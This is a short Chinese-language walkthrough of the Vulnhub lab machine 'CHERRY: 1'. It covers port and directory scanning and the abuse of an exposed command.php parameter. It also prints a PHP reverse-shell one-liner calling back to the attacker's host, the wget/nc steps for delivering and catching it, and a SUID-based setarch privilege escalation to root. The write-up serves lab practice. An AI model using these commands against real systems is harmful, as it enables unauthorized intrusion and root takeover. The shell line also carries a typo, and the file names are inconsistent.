Vulnhub靶机渗透测试实战(一):CHERRY: 1
下载地址:http://www.vulnhub.com/entry/cherry-1,552/
实验环境:VMware,kali虚拟机
将下载好的镜像文件导入VMware
局域网内扫描主机
arp-scan -l
一般情况最大最小的不会是靶机的IP,所以靶机的IP为:192.168.46.130
nmap扫描主机,查看开启了那些端口
nmap -sV -p- 192.168.46.130
发现开放了80,7755两个端口,进行访问,发现两个页面相同,未发现异常
尝试爆破目录
dirb http://192.168.46.130
dirb http://192.168.46.130:7755
分别访问backup目录
访问command.php发现源码,可以看到这里进行了一个GET传参
可以执行简单的cmd命令,权限不够不能执行反弹shell
在kali中写脚本
php -r '$sock-fsockopen("192.168.46.128",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
开启http服务
python -m SimpleHTTPServer port(任意指定一个端口)
用wget 将shell文件下载到/tmp下(特别注意:一定要开启http服务,否则上传进去的文件没有内容)
ls -al /tmp 查看文件权限,可以看到文件不具备执行权限
修改文件权限
chmod 777 /tmp/test.php
再次查看具有执行权限
使用kali监听1234端口,并且执行test.sh
nc -lvp 1234
反弹shell
find / -perm -u=s -type f 2>/dev/null
提升权限
setarch $(arch) /bin/sh -p
得到root权限
参考:blog.csdn.net/qq_45826388/article/details/108651679